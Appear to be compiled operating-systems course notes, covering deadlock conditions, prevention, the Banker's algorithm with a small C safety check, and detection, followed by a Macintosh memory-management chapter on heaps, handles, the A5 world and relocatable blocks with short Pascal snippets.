The simplest example of deadlock is where process 1 has been allocated a non-shareable resource A, say a tape drive, and process 2 has been allocated a non-shareable resource B, say a printer. Now, if it turns out that process 1 needs resource B (the printer) to proceed and process 2 needs resource A (the tape drive) to proceed, and these are the only two processes in the system, each is blocking the other and all useful work in the system stops. This situation is termed deadlock. The system is in a deadlock state because each process holds a resource being requested by the other process, and neither process is willing to release the resource it holds.

Preemptable and Nonpreemptable Resources

Resources come in two flavors: preemptable and nonpreemptable. A preemptable resource is one that can be taken away from the process with no ill effects; memory is an example of a preemptable resource. A nonpreemptable resource, on the other hand, is one that cannot be taken away from a process without causing ill effects. CD recorders, for example, are not preemptable at an arbitrary moment. Reallocating resources can resolve deadlocks that involve preemptable resources; deadlocks that involve nonpreemptable resources are difficult to deal with.

Deadlock Condition

Necessary and Sufficient Deadlock Conditions

Coffman (1971) identified four conditions that must hold simultaneously for there to be a deadlock.

• Mutual Exclusion Condition: The resources involved are non-shareable. Explanation: At least one resource must be held in a non-shareable mode, that is, only one process at a time claims exclusive control of the resource. If another process requests that resource, the requesting process must be delayed until the resource has been released.
• Hold and Wait Condition: A requesting process holds resources already allocated to it while waiting for additional resources. Explanation: There must exist a process that is holding a resource already allocated to it while waiting for additional resources that are currently being held by other processes.
• No-Preemption Condition: Resources already allocated to a process cannot be preempted. Explanation: Resources cannot be removed from a process; they are used to completion or released voluntarily by the process holding them.
• Circular Wait Condition: The processes in the system form a circular list or chain where each process in the list is waiting for a resource held by the next process in the list.

As an example, consider the traffic deadlock in the following figure, and consider each section of the street as a resource.

• The mutual exclusion condition applies, since only one vehicle can be on a section of the street at a time.
• The hold-and-wait condition applies, since each vehicle is occupying a section of the street and waiting to move on to the next section of the street.
• The no-preemption condition applies, since a section of the street that is occupied by a vehicle cannot be taken away from it.
• The circular wait condition applies, since each vehicle is waiting on the next vehicle to move. That is, each vehicle in the traffic is waiting for a section of street held by the next vehicle in the traffic.

The simple rule to avoid traffic deadlock is that a vehicle should only enter an intersection if it is assured that it will not have to stop inside the intersection.

It is not possible to have a deadlock involving only one single process. The deadlock involves a circular "hold-and-wait" condition between two or more processes, so "one" process cannot hold a resource yet be waiting for another resource that it is holding. In addition, deadlock is not possible between two threads in a process, because it is the process that holds resources, not the thread; each thread has access to the resources held by the process.

Dealing with the Deadlock Problem

In general, there are four strategies for dealing with the deadlock problem:

• The Ostrich Approach: Just ignore the deadlock problem altogether.
• Deadlock Detection and Recovery: Detect deadlock and, when it occurs, take steps to recover.
• Deadlock Avoidance: Avoid deadlock by careful resource scheduling.
• Deadlock Prevention: Prevent deadlock by resource scheduling so as to negate at least one of the four conditions.

Deadlock Prevention

Havender, in his pioneering work, showed that since all four of the conditions are necessary for deadlock to occur, it follows that deadlock might be prevented by denying any one of the conditions.

Elimination of the "Mutual Exclusion" Condition: The mutual exclusion condition must hold for non-sharable resources; that is, several processes cannot simultaneously share a single resource. This condition is difficult to eliminate because some resources, such as the tape drive and printer, are inherently non-shareable. Note that shareable resources, like a read-only file, do not require mutually exclusive access and thus cannot be involved in deadlock.

Elimination of the "Hold and Wait" Condition: There are two possibilities for eliminating the second condition. The first alternative is that a process be granted all of the resources it needs at once, prior to execution. This strategy requires that all of the resources a process will need be requested at once.
The system must grant resources on an “all or none” basis. If the complete set of resources needed by a process is not currently available, then the process must wait until the complete set is available. While the process waits, however, it may not hold any resources; thus the “wait for” condition is denied, and deadlocks simply cannot occur. This strategy can lead to serious waste of resources. For example, a program requiring ten tape drives must request and receive all ten drives before it begins executing. If the program needs only one tape drive to begin execution, and does not need the remaining tape drives for several hours, then substantial computer resources (9 tape drives) will sit idle for several hours. One serious consequence of this strategy is the possibility of indefinite postponement (starvation), since not all the required resources may become available at once.

The second alternative is to disallow a process from requesting resources whenever it has previously allocated resources. Suppose a system did allow processes to hold resources while requesting additional resources, and consider what happens when a request cannot be satisfied: a process holds resources a second process may need in order to proceed, while the second process may hold the resources needed by the first process. This is a deadlock. The strategy therefore requires that when a process that is holding some resources is denied a request for additional resources, it must release its held resources and, if necessary, request them again together with the additional resources.

Elimination of the "No-Preemption" Condition: The no-preemption condition can be alleviated by forcing a process waiting for a resource that cannot immediately be allocated to relinquish all of its currently held resources, so that other processes may use them to finish. Implementation of this strategy effectively denies the "no-preemption" condition, but its cost is high: when a process releases resources, it may lose all its work to that point. This strategy can also cause indefinite postponement (starvation): a process might be held off indefinitely as it repeatedly requests and releases the same resources.

Elimination of the "Circular Wait" Condition: The last condition, circular wait, can be denied by imposing a total ordering on all of the resource types and then forcing all processes to request resources in order (increasing or decreasing) of enumeration. With this rule, the resource allocation graph can never have a cycle.

For example, provide a global numbering of all the resources, as shown:

    1 ≡ Card reader
    2 ≡ Printer
    3 ≡ Plotter
    4 ≡ Tape drive
    5 ≡ Card punch

Now the rule is this: processes can request resources whenever they want to, but all requests must be made in numerical order. A process may request first a printer and then a tape drive (order: 2, 4), but it may not request first a plotter and then a printer (order: 3, 2). The problem with this strategy is that it may be impossible to find an ordering that satisfies everyone.

Deadlock Avoidance

This approach to the deadlock problem anticipates deadlock before it actually occurs. It differs from deadlock prevention, which guarantees that deadlock cannot occur by denying one of the necessary conditions of deadlock. Even if the necessary conditions for a deadlock are in place, it is still possible to avoid deadlock by being careful when resources are allocated. This approach employs an algorithm to assess the possibility that deadlock could occur and acts accordingly.

Banker's Algorithm

Perhaps the most famous deadlock avoidance algorithm, due to Dijkstra [1965], is the Banker's algorithm, so named because the process is analogous to that used by a banker in deciding if a loan can be safely made. In this analogy:

    Customers ≡ processes
    Units     ≡ resources (tape drives, say)
    Banker    ≡ Operating System

    Customers  Used  Max
    A          0     6
    B          0     5
    C          0     4
    D          0     7
                          Available Units = 10
    Fig. 1

In the above figure, we see four customers, each of whom has been granted a number of credit units. The banker reserved only 10 units, rather than 22 units, to service them.
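The banker's decision rests on a safety test: a state is safe if the customers can finish in some order, each running to its maximum using the currently available units plus whatever earlier finishers return. Here is a C sketch of that test for the single resource type used in these figures; it is illustrative only, not the full multi-resource algorithm.

    #include <stdbool.h>

    /* Safe if SOME ordering lets every customer reach its maximum. */
    bool is_safe(const int used[], const int max[], int n, int available) {
        bool done[16] = {false};           /* assumes n <= 16 */
        for (int finished = 0; finished < n; ) {
            int i;
            for (i = 0; i < n; i++) {
                if (!done[i] && max[i] - used[i] <= available) {
                    available += used[i];  /* customer i finishes, returns units */
                    done[i] = true;
                    finished++;
                    break;
                }
            }
            if (i == n) return false;      /* nobody can finish: unsafe */
        }
        return true;
    }

With the Fig. 2 numbers that follow (used 1, 1, 2, 4 against maxima 6, 5, 4, 7 and 2 units free), this test reports safe: C can finish first. With the Fig. 3 numbers it reports unsafe, since no customer's remaining need fits in the single free unit.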

At a certain moment, the situation becomes:

    Customers  Used  Max
    A          1     6
    B          1     5
    C          2     4
    D          4     7
                          Available Units = 2
    Fig. 2

Safe State: The key to a state being safe is that there is at least one way for all customers to finish. The state of Fig. 2 is safe because, with 2 units left, the banker can delay any request except C's, thus letting C finish and release all four of its resources. With four units in hand, the banker can then let either D or B have the necessary units, and so on.

Unsafe State: Consider what would happen if a request from B for one more unit were granted in Fig. 2. We would have the following situation:

    Customers  Used  Max
    A          1     6
    B          2     5
    C          2     4
    D          4     7
                          Available Units = 1
    Fig. 3

This is an unsafe state. If all the customers, namely A, B, C, and D, asked for their maximum loans, the banker could not satisfy any of them, and we would have a deadlock. It is important to note that an unsafe state does not imply the existence, or even the eventual existence, of a deadlock. What an unsafe state does imply is simply that some unfortunate sequence of events might lead to a deadlock.

The Banker's algorithm is thus to consider each request as it occurs and see if granting it leads to a safe state. If it does, the request is granted; otherwise, it is postponed until later. Haberman [1969] has shown that executing the algorithm has complexity proportional to N², where N is the number of processes, and since the algorithm is executed each time a resource request occurs, the overhead is significant. Another potential problem is starvation: a request might be postponed indefinitely.

Deadlock Detection

Deadlock detection is the process of actually determining that a deadlock exists and identifying the processes and resources involved in the deadlock. The basic idea is to check allocation against resource availability for all possible allocation sequences to determine if the system is in a deadlocked state. Of course, the deadlock detection algorithm is only half of this strategy: once a deadlock is detected, there needs to be a way to recover. Several alternatives exist:

• Temporarily preempt resources from deadlocked processes.
• Back off a process to some checkpoint, allowing preemption of a needed resource, and restart the process from the checkpoint later.
• Successively kill processes until the system is deadlock free.

These methods are expensive in the sense that each iteration calls the detection algorithm until the system proves to be deadlock free; the complexity of the algorithm is O(N²), where N is the number of processes. Another potential problem is starvation: the same process may be killed repeatedly.

CHAPTER 8
MEMORY MANAGEMENT

About Memory

A Macintosh computer's available RAM is used by the Operating System, applications, and other software components, such as device drivers and system extensions. This section describes both the general organization of memory by the Operating System and the organization of the memory partition allocated to your application when it is launched. This section also provides a preliminary description of three related memory topics:

• temporary memory
• virtual memory
• 24- and 32-bit addressing

For more complete information on these three topics, you need to read the remaining chapters in this book.

Organization of Memory by the Operating System

When the Macintosh Operating System starts up, it divides the available RAM into two broad sections. It reserves for itself a zone or partition of memory known as the system partition. The system partition always begins at the lowest addressable byte of memory (memory address 0) and extends upward. The system partition contains a system heap and a set of global variables, described in the next two sections.

All memory outside the system partition is available for allocation to applications or other software components. In system software version 7.0 and later (or when MultiFinder is running in system software versions 5.0 and 6.0), the user can have multiple applications open at once. When an application is launched, the Operating System assigns it a section of memory known as its application partition. In general, an application uses only the memory contained in its own application partition.

Figure 1-1 illustrates the organization of memory when several applications are open at the same time. The system partition occupies the lowest position in memory, and application partitions occupy part of the remaining space. Note that application partitions are loaded into the top part of memory first.

In Figure 1-1, three applications are open, each with its own application partition. The application labeled Application 1 is the active application.

The System Heap

The main part of the system partition is an area of memory known as the system heap. In general, the system heap is reserved for exclusive use by the Operating System and other system software components, which load into it various items such as system resources, system code segments, and system data structures. All system buffers and queues, for example, are allocated in the system heap.

The system heap is also used for code and other resources that do not belong to specific applications, such as code resources that add features to the Operating System or that provide control of special-purpose peripheral equipment. System patches and system extensions (stored as code resources of type 'INIT') are loaded into the system heap during the system startup process. Hardware device drivers (stored as code resources of type 'DRVR') are loaded into the system heap when the driver is opened.

Most applications don't need to load anything into the system heap. In certain cases, however, you might need to load resources or code segments into the system heap. For example, if you want a vertical retrace task to continue to execute even when your application is in the background, you need to load the task and any data associated with it into the system heap.

Otherwise, the Vertical Retrace Manager ignores the task when your application is in the background.

The System Global Variables

The lowest part of memory is occupied by a collection of global variables called system global variables (or low-memory system global variables). The Operating System uses these variables to maintain different kinds of information about the operating environment. For example, the Ticks global variable contains the number of ticks (sixtieths of a second) that have elapsed since the system was most recently started up. Similar variables contain, for example, the height of the menu bar (MBarHeight) and pointers to the heads of various operating-system queues (DTQueue, FSQHdr, VBLQueue, and so forth). Most of these variables are undocumented, and the results of changing their values can be unpredictable.

Other low-memory global variables contain information about the current application. For example, the ApplZone global variable contains the address of the first byte of the active application's partition. The ApplLimit global variable contains the address of the last byte the active application's heap can expand to include. The CurrentA5 global variable contains the address of the boundary between the active application's global variables and its application parameters. Because these global variables contain information about the active application, the Operating System changes the values of these variables whenever a context switch occurs.

In general, it is best to avoid reading or writing low-memory system global variables. Most of these variables contain information that is generally useful only to the Operating System or other system software components. Usually, when the value of a low-memory global variable is likely to be useful to applications, the system software provides a routine that you can use to read or write that value. For example, you can get the current value of the Ticks global variable by calling the TickCount function. In rare instances, there is no routine that reads or writes the value of a documented global variable; in those cases, you might need to read or write that value directly. See the chapter "Memory Manager" in this book for instructions on reading and writing the values of low-memory global variables from a high-level language.
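For example, instead of reading the Ticks global directly, an application calls its accessor. A small C sketch for the classic Mac OS Toolbox environment (the header name and the sixty-ticks-per-second rate are as documented for that era, but treat the details as illustrative):

    #include <Events.h>        /* declares TickCount() on classic Mac OS */

    void wait_one_second(void) {
        unsigned long start = TickCount();     /* one tick = 1/60 second */
        while (TickCount() - start < 60)
            ;                                  /* spin for about a second */
    }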

Organization of Memory in an Application Partition

When your application is launched, the Operating System allocates for it a partition of memory called its application partition. That partition contains required segments of the application's code as well as other data associated with the application. Figure 1-2 illustrates the general organization of an application partition.

Figure 1-2 Organization of an application partition

Your application partition is divided into three major parts:

• the application stack
• the application heap
• the application global variables and A5 world

The heap is located at the low-memory end of your application partition and always expands (when necessary) toward high memory. The A5 world is located at the high-memory end of your application partition and is of fixed size. The stack begins at the low-memory end of the A5 world and expands downward, toward the top of the heap.

As you can see in Figure 1-2, there is usually an unused area of memory between the stack and the heap. This unused area provides space for the stack to grow without encroaching upon the space assigned to the application heap. In some cases, however, the stack might grow into space reserved for the application heap. If this happens, it is very likely that data in the heap will become corrupted.

The ApplLimit global variable marks the upper limit to which your heap can grow. If you call the MaxApplZone procedure at the beginning of your program, the heap immediately extends all the way up to this limit. If you were to use all of the heap's free space, the Memory Manager would not allow you to allocate additional blocks above ApplLimit. If you do not call MaxApplZone, the heap grows toward ApplLimit whenever the Memory Manager finds that there is not enough memory in the heap to fill a request; however, once the heap grows up to ApplLimit, it can grow no further. Thus, whether you maximize your application heap or not, you can use only the space between the bottom of the heap and ApplLimit.

Unlike the heap, the stack is not bounded by ApplLimit. If your application uses heavily nested procedures with many local variables, or uses extensive recursion, the stack could grow downward beyond ApplLimit. Because you do not use Memory Manager routines to allocate memory on the stack, the Memory Manager cannot stop your stack from growing beyond ApplLimit and possibly encroaching upon space reserved for the heap. However, a vertical retrace task checks approximately 60 times each second to see if the stack has moved into the heap. If it has, the task, known as the "stack sniffer," generates a system error. This system error alerts you that you have allowed the stack to grow too far, so that you can make adjustments. See "Changing the Size of the Stack" on page 1-39 for instructions on how to change the size of your application stack.

The Application Stack

The stack is an area of memory in your application partition that can grow or shrink at one end while the other end remains fixed. The end of the stack that grows or shrinks is usually referred to as the "top" of the stack, even though it's actually at the lower end of the memory occupied by the stack; by convention, the stack grows from high memory toward low memory addresses.

This means that space on the stack is always allocated and released in LIFO (last-in, first-out) order: the last item allocated is always the first to be released. It also means that the allocated area of the stack is always contiguous. Space is released only at the top of the stack, never in the middle, so there can never be any unallocated "holes" in the stack.

Because of its LIFO nature, the stack is especially useful for memory allocation connected with the execution of functions or procedures. When your application calls a routine, space is automatically allocated on the stack for a stack frame. A stack frame contains the routine's parameters, local variables, and return address. Figure 1-3 illustrates how the stack expands and shrinks during a function call. The leftmost diagram shows the stack just before the function is called; the middle diagram shows the stack expanded to hold the stack frame. Once the function is executed, the local variables and function parameters are popped off the stack; if the function is a Pascal function, all that remains is the previous stack with the function result on top.

Figure 1-3 The application stack

The Application Heap

An application heap is the area of memory in your application partition in which space is dynamically allocated and released on demand. The heap begins at the low-memory end of your application partition and extends upward in memory. The heap contains virtually all items that are not allocated on the stack. For instance, your application heap contains the application's code segments and resources that are currently loaded into memory. The heap also contains other dynamically allocated items such as window records, dialog records, document data, and so forth.

You allocate space within your application's heap by making calls to the Memory Manager, either directly (for instance, using the NewHandle function) or indirectly (for instance, using a routine such as NewWindow, which calls Memory Manager routines). Space in the heap is allocated in blocks, which can be of any size needed for a particular object. The Memory Manager does all the necessary housekeeping to keep track of blocks in the heap as they are allocated and released.

Unlike the stack, the heap doesn't usually grow and shrink in an orderly way. Because allocation and release operations can occur in any order, the heap tends, after your application has been running for a while, to become fragmented into a patchwork of allocated and free blocks, as shown in Figure 1-4. This fragmentation is known as heap fragmentation.

Figure 1-4 A fragmented heap

One result of heap fragmentation is that the Memory Manager might not be able to satisfy your application's request to allocate a block of a particular size: even though there is enough free space available, the space is broken up into blocks smaller than the requested size. When this happens, the Memory Manager tries to create the needed space by moving allocated blocks together, thus collecting the free space in a single larger block. This operation is known as heap compaction.
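Compaction can move a relocatable block because applications refer to such blocks through handles: a pointer to a master pointer maintained by the Memory Manager. The following toy C program (not the real Memory Manager) shows why a move does not break the application's reference.

    #include <stdio.h>
    #include <string.h>

    int main(void) {
        char block_at_old_home[16] = "payload";
        char block_at_new_home[16];

        char *master  = block_at_old_home; /* master pointer to the block */
        char **handle = &master;           /* what the application holds */

        /* "Compaction": move the block and fix up the master pointer.
           The handle held by the application never changes. */
        memcpy(block_at_new_home, block_at_old_home, sizeof block_at_new_home);
        master = block_at_new_home;

        printf("%s\n", *handle);           /* still valid after the move */
        return 0;
    }

A nonrelocatable block, by contrast, is referenced by a plain pointer, so the Memory Manager must leave it where it is; this is why such blocks pin down the heap during compaction.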

Figure 1-5 shows the results of compacting the fragmented heap shown in Figure 1-4.

Figure 1-5 A compacted heap

Heap fragmentation is generally not a problem as long as the blocks of memory you allocate are free to move during heap compaction. There are, however, two situations in which a block is not free to move: when it is a nonrelocatable block, and when it is a locked, relocatable block. To minimize heap fragmentation, you should use nonrelocatable blocks sparingly, and you should lock relocatable blocks only when absolutely necessary.

The Application Global Variables and A5 World

Your application's global variables are stored in an area of memory near the top of your application partition known as the application A5 world. The A5 world contains four kinds of data:

• application global variables
• application QuickDraw global variables
• application parameters
• the application's jump table

Each of these items is of fixed size, although the sizes of the global variables and of the jump table may vary from application to application. Figure 1-6 shows the standard organization of the A5 world.

Figure 1-6 Organization of an application's A5 world

The system global variable CurrentA5 points to the boundary between the current application's global variables and its application parameters; the application's global variables are found as negative offsets from the value of CurrentA5. This boundary is important because the Operating System uses it to access the following information from your application: its global variables, its QuickDraw global variables, the application parameters, and the jump table. This information is known collectively as the A5 world because the Operating System uses the microprocessor's A5 register to point to that boundary.

Your application's QuickDraw global variables contain information about its drawing environment. For example, among these variables is a pointer to the current graphics port.

The application parameters are 32 bytes of memory located above the application global variables; they're reserved for use by the Operating System. The first long word of those parameters is a pointer to your application's QuickDraw global variables.

Your application's jump table contains an entry for each of your application's routines that is called by code in another segment. The Segment Manager uses the jump table to determine the address of any externally referenced routines called by a code segment.

Temporary Memory

In the Macintosh multitasking environment, each application is limited to a particular memory partition (whose size is determined by information in the 'SIZE' resource of that application). The size of your application's partition places certain limits on the size of your application heap, and hence on the sizes of the buffers and other data structures that your application uses. In general, you specify an application partition size that is large enough to hold all the buffers, resources, and other data that your application is likely to need during its execution.

If for some reason you need more memory than is currently available in your application heap, you can ask the Operating System to let you use any available memory that is not yet allocated to any other application. This memory, known as temporary memory, is allocated from the available unused RAM.

If you receive the temporary memory, that memory is not contiguous with the memory in your application's zone. Figure 1-7 shows an application using some temporary memory. In Figure 1-7, Application 1 has almost exhausted its application heap. As a result, it has requested and received a large block of temporary memory, extending from the top of Application 2's partition to the top of the allocatable space. Application 1 can use the temporary memory in whatever manner it desires.

Figure 1-7 Using temporary memory allocated from unused RAM

Your application should use temporary memory only for occasional short-term purposes that could be accomplished in less space, though perhaps less efficiently. One good reason for using temporary memory only occasionally is that you cannot assume that you will always receive the temporary memory you request. For example, in Figure 1-7, all the available memory is allocated to the two open applications; any further requests by either one for some temporary memory would fail.

For example, if you want to copy a large file, you might try to allocate a fairly large buffer of temporary memory. If, however, the request for temporary memory fails, you can instead use a smaller buffer within your application heap. Although using the smaller buffer might prolong the copying operation, the file is nonetheless copied. For complete details on using temporary memory, see the chapter "Memory Manager" in this book.
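A minimal sketch of this fallback strategy follows, using the Memory Manager's TempNewHandle function; the buffer sizes here are arbitrary assumptions, and the copying loop itself is omitted.

PROCEDURE DoCopyWithBestBuffer;
CONST
   kBigBufferSize   = 100 * 1024;     {hypothetical large temporary-memory buffer}
   kSmallBufferSize = 4 * 1024;       {hypothetical fallback buffer in the heap}
VAR
   myErr:    OSErr;
   myBuffer: Handle;
BEGIN
   myBuffer := TempNewHandle(kBigBufferSize, myErr);   {try temporary memory first}
   IF (myBuffer = NIL) OR (myErr <> noErr) THEN
      myBuffer := NewHandle(kSmallBufferSize);         {fall back to the application heap}
   IF myBuffer <> NIL THEN
   BEGIN
      {... copy from the source file to the destination file through myBuffer ...}
      DisposeHandle(myBuffer);                         {release the buffer promptly}
   END;
END;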

Virtual Memory

In system software version 7.0 and later, suitably equipped Macintosh computers can take advantage of a feature of the Operating System known as virtual memory, by which the machines have a logical address space that extends beyond the limits of the available physical memory. Because of virtual memory, a user can load more programs and data into the logical address space than would fit in the computer's physical RAM. The Operating System extends the address space by using part of the available secondary storage (that is, part of a hard disk) to hold portions of applications and data that are not currently needed in RAM. When some of those portions of memory are needed, the Operating System swaps out unneeded parts of applications or data to the secondary storage, thereby making room for the parts that are needed.

It is important to realize that virtual memory operates transparently to most applications. Unless your application has time-critical needs that might be adversely affected by the operation of virtual memory or installs routines that execute at interrupt time, you do not need to know whether virtual memory is operating. For complete details on virtual memory, see the chapter "Virtual Memory Manager" later in this book.

Addressing Modes

On suitably equipped Macintosh computers, the Operating System supports 32-bit addressing, that is, the ability to use 32 bits to determine memory addresses. Earlier versions of system software use 24-bit addressing, where the upper 8 bits of memory addresses are ignored or used as flag bits. In a 24-bit addressing scheme, the logical address space has a size of 16 MB. Because 8 MB of this total are reserved for I/O space, ROM, and slot space, the largest contiguous program address space is 8 MB. When 32-bit addressing is in operation, the maximum program address space is 1 GB.

The ability to operate with 32-bit addressing is available only on certain Macintosh models, namely those with systems that contain a 32-bit Memory Manager. (For compatibility reasons, these systems also contain a 24-bit Memory Manager.)

In order for your application to work when the machine is using 32-bit addressing, it must be 32-bit clean, that is, able to run in an environment where all 32 bits of a memory address are significant. Fortunately, writing applications that are 32-bit clean is relatively easy if you follow the guidelines in Inside Macintosh. In general, applications are not 32-bit clean because they manipulate flag bits in master pointers directly (for instance, to mark the associated memory blocks as locked or purgeable) instead of using Memory Manager routines to achieve the desired result.
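As a hedged illustration of the kind of code that is not 32-bit clean, the first procedure below pokes a flag bit into a master pointer directly; the mask shown is merely illustrative of the old 24-bit scheme, and ORD4 and BOR are MPW Pascal extensions. The second procedure achieves the same effect portably with a Memory Manager call.

PROCEDURE LockBlockTheWrongWay (h: Handle);
BEGIN
   {DON'T DO THIS: treats the high bits of the master pointer as flags;}
   {under 32-bit addressing this corrupts the block's address}
   h^ := Ptr(BOR(ORD4(h^), $80000000));
END;

PROCEDURE LockBlockTheRightWay (h: Handle);
BEGIN
   HLock(h);     {the Memory Manager sets the lock attribute on any system}
END;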

Heap Management

Applications allocate and manipulate memory primarily in their application heap. As you have seen, space in the application heap is allocated and released on demand. When the blocks in your heap are free to move, the Memory Manager can often reorganize the heap to free space when necessary to fulfill a memory-allocation request. In some cases, however, blocks in your heap cannot move. In these cases, you need to pay close attention to memory allocation and management to avoid fragmenting your heap and running out of memory.

This section provides a general description of how to manage blocks of memory in your application heap. It describes
• relocatable and nonrelocatable blocks
• properties of relocatable blocks
• heap purging and compaction
• heap fragmentation
• dangling pointers
• low-memory conditions

Relocatable and Nonrelocatable Blocks

You can use the Memory Manager to allocate two different types of blocks in your heap: nonrelocatable blocks and relocatable blocks. A nonrelocatable block is a block of memory whose location in the heap is fixed. In contrast, a relocatable block is a block of memory that can be moved within the heap (perhaps during heap compaction). The Memory Manager sometimes moves relocatable blocks during memory operations so that it can use the space in the heap optimally.

The Memory Manager provides data types that reference both relocatable and nonrelocatable blocks. It also provides routines that allow you to allocate and release blocks of both types.

To reference a nonrelocatable block, you can use a pointer variable, defined by the Ptr data type.

TYPE
   SignedByte = -128..127;
   Ptr        = ^SignedByte;

A pointer is simply the address of an arbitrary byte in memory, and a pointer to a nonrelocatable block of memory is simply the address of the first byte in the block, as illustrated in Figure 1-8. After you allocate a nonrelocatable block, you can make copies of the pointer variable. Because a pointer is the address of a block of memory that cannot be moved, all copies of the pointer correctly reference the block as long as you don't dispose of it.

Figure 1-8 A pointer to a nonrelocatable block

The pointer variable itself occupies 4 bytes of space in your application partition. Often the pointer variable is a global variable and is therefore contained in your application's A5 world. But the pointer can also be allocated on the stack or in the heap itself.

To reference relocatable blocks, the Memory Manager uses a scheme known as double indirection. The Memory Manager keeps track of a relocatable block internally with a master pointer, which itself is part of a nonrelocatable master pointer block in your application heap and can never move. When the Memory Manager moves a relocatable block, it updates the master pointer so that it always contains the address of the relocatable block. You reference the block with a handle, defined by the Handle data type.

TYPE
   Handle = ^Ptr;

A handle contains the address of a master pointer. The left side of Figure 1-9 shows a handle to a relocatable block of memory located in the middle of the application heap. If necessary (perhaps to make room for another block of memory), the Memory Manager can move that block down in the heap, as shown in the right side of Figure 1-9.

Figure 1-9 A handle to a relocatable block
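To make double indirection concrete, the following minimal sketch defines a hypothetical record type, allocates a relocatable block for it, and reaches a field through the handle; all the type names here are illustrative, not part of the Toolbox.

TYPE
   MyRec       = RECORD
      count: Integer;
   END;
   MyRecPtr    = ^MyRec;
   MyRecHandle = ^MyRecPtr;

PROCEDURE DoUseHandle;
VAR
   h: MyRecHandle;
BEGIN
   h := MyRecHandle(NewHandle(SizeOf(MyRec)));   {allocate a relocatable block}
   IF h <> NIL THEN
   BEGIN
      h^^.count := 1;             {handle -> master pointer -> block}
      DisposeHandle(Handle(h));   {release the block when finished}
   END;
END;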

Master pointers for relocatable objects in your heap are always allocated in your application heap. Because the blocks of master pointers are nonrelocatable, it is best to allocate them as low in your heap as possible. You can do this by calling the MoreMasters procedure when your application starts up.

Whenever possible, you should allocate memory in relocatable blocks. This gives the Memory Manager the greatest freedom when rearranging the blocks in your application heap to create a new block of free memory. In some cases, however, you may be forced to allocate a nonrelocatable block of memory. When you call the Window Manager function NewWindow, for example, the Window Manager internally calls the NewPtr function to allocate a new nonrelocatable block in your application partition. You need to exercise care when calling Toolbox routines that allocate such blocks, lest your application heap become overly fragmented.

Using relocatable blocks makes the Memory Manager more efficient at managing available space, but it does carry some overhead: the Memory Manager must allocate extra memory to hold master pointers for relocatable blocks. It groups these master pointers into nonrelocatable blocks. For large relocatable blocks, this extra space is negligible, but if you allocate many very small relocatable blocks, the cost can be considerable. For this reason, you should avoid allocating a very large number of handles to small blocks; instead, allocate a single large block and use it as an array to hold the data you need.

Properties of Relocatable Blocks

As you have seen, a heap block can be either relocatable or nonrelocatable. The designation of a block as relocatable or nonrelocatable is a permanent property of that block. If relocatable, a block can be either locked or unlocked; if it's unlocked, a block can be either purgeable or unpurgeable. These attributes of relocatable blocks can be set and changed as necessary. The following sections explain how to lock and unlock blocks, and how to mark them as purgeable or unpurgeable.

Locking and Unlocking Relocatable Blocks: Occasionally, you might need a relocatable block of memory to stay in one place. To prevent a block from moving, you can lock it, using the HLock procedure. Once you have locked a block, it won't move. Later, you can unlock it, using the HUnlock procedure, allowing it to move again.

In general, you need to lock a relocatable block only if there is some danger that it might be moved during the time that you read or write the data in that block. This might happen, for instance, if you dereference a handle to obtain a pointer to the data and (for increased speed) use the pointer within a loop that calls routines that might cause memory to be moved. If, within the loop, the block whose data you are accessing is in fact moved, then the pointer no longer points to that data; this pointer is said to dangle.

Using locked relocatable blocks can, however, slow the Memory Manager down as much as using nonrelocatable blocks. The Memory Manager can't move locked blocks. In addition, except when you allocate memory and resize relocatable blocks, it can't move relocatable blocks around locked relocatable blocks (just as it can't move them around nonrelocatable blocks). Thus, locking a block in the middle of the heap for long periods of time can increase heap fragmentation.

Locking and unlocking blocks every time you want to prevent a block from moving can become troublesome. Fortunately, the Memory Manager moves unlocked, relocatable blocks only at well-defined, predictable times. In general, each routine description in Inside Macintosh indicates whether the routine could move or purge memory. If you do not call any of those routines in a section of code, you can rely on all blocks to remain stationary while that code executes. Note that the Segment Manager might move memory if you call a routine located in a segment that is not currently resident in memory.

Purging and Reallocating Relocatable Blocks: One advantage of relocatable blocks is that you can use them to store information that you would like to keep in memory to make your application more efficient, but that you don't really need if available memory space becomes low. For example, your application might, at the beginning of its execution, load user preferences from a preferences file into a relocatable block. As long as the block remains in memory, your application can access information from the preferences file without actually reopening the file. However, reopening the file probably wouldn't take enough time to justify keeping the block in memory if memory space were scarce.

By making a relocatable block purgeable, you allow the Memory Manager to free the space it occupies if necessary. If you later want to prohibit the Memory Manager from freeing the space occupied by a relocatable block, you can make the block unpurgeable. You can use the HPurge and HNoPurge procedures to change back and forth between these two states. A block you create by calling NewHandle is initially unpurgeable.

Once you make a relocatable block purgeable, you should subsequently check handles to that block before using them if you call any of the routines that could move or purge memory. If a handle's master pointer is set to NIL, then the Operating System has purged its block. To use the information formerly in the block, you must reallocate space for it (perhaps by calling the ReallocateHandle procedure) and then reconstruct its contents (for example, by rereading the preferences file).

Figure 1-10 illustrates the purging and reallocating of a relocatable block. When the block is purged, its master pointer is set to NIL. When it is reallocated, the handle correctly references a new block, but that block's contents are initially undefined.

Figure 1-10 Purging and reallocating a relocatable block
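The check-and-reallocate pattern just described might look like the following sketch; gPrefsHandle, kPrefsSize, and the rereading step are hypothetical names and placeholders used only for illustration. When you are finished using the block, you could call HPurge to make it purgeable again.

CONST
   kPrefsSize = 512;             {hypothetical size of the preferences block}
VAR
   gPrefsHandle: Handle;         {created at startup with NewHandle, then marked purgeable}

PROCEDURE DoEnsurePrefsLoaded;
BEGIN
   IF gPrefsHandle^ = NIL THEN                       {NIL master pointer: block was purged}
   BEGIN
      ReallocateHandle(gPrefsHandle, kPrefsSize);    {allocate a new block for the handle}
      IF gPrefsHandle^ <> NIL THEN
         {... reread the preferences file into gPrefsHandle ...};
   END;
   HNoPurge(gPrefsHandle);       {keep the block resident while it is in use}
END;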

Memory Reservation

The Memory Manager does its best to prevent situations in which nonrelocatable blocks in the middle of the heap trap relocatable blocks. When it allocates new nonrelocatable blocks, it attempts to reserve memory for them as low in the heap as possible. The Memory Manager reserves memory for a nonrelocatable block by moving unlocked relocatable blocks upward until it has created a space large enough for the new block. When the Memory Manager can successfully pack all nonrelocatable blocks into the bottom of the heap, no nonrelocatable block can trap a relocatable block, and it has successfully prevented heap fragmentation.

Figure 1-11 illustrates how the Memory Manager allocates nonrelocatable blocks. Although it could place a block of the requested size at the top of the heap, it instead reserves space for the block as close to the bottom of the heap as possible and then puts the block into that reserved space. During this process, the Memory Manager might even move a relocatable block over a nonrelocatable block to make room for another nonrelocatable block.

Figure 1-11 Allocating a nonrelocatable block

